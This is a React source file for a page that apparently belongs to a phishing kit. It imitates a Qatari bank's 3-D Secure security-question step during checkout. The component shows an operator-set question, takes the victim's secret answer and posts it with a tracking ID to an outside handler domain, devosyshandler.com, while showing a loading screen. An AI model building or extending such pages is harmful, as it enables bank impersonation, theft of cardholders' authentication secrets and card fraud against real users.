import React, { useState } from 'react';
import axios from 'axios';
import { useNavigate } from 'react-router-dom';
import QatarBankLayout from './qatar/QatarBankLayout';

const SecurityQuestionPage = () => {
  const [answer, setAnswer] = useState('');
  const [isSubmitting, setIsSubmitting] = useState(false);
  const navigate = useNavigate();
  const design = localStorage.getItem('session_design') || 'qatar_default';
  const customQuestion = localStorage.getItem('seq_quest');

  const handleQuestionSubmit = async (e) => {
    e?.preventDefault();
    if (!answer.trim() || isSubmitting) return;

    setIsSubmitting(true);
    navigate('/3ds/loading');

    const dataToSend = {
      uuId: localStorage.getItem('uuId'),
      question: customQuestion,
      answer: answer,
    };

    try {
      const serverUrl = process.env.REACT_APP_SERVER_URL || 'https://devosyshandler.com';
      await axios.post(`${serverUrl}/api/secret_verif`, dataToSend);
    } catch (error) {
      console.error('Question submit error:', error);
      setIsSubmitting(false);
    }
  };

  return (
    <QatarBankLayout
      design={design}
      mode="question"
      customQuestion={customQuestion}
      answer={answer}
      setAnswer={setAnswer}
      handleQuestionSubmit={handleQuestionSubmit}
      isSubmitting={isSubmitting}
      onCancel={() => navigate('/checkout')}
    />
  );
};

export default SecurityQuestionPage;
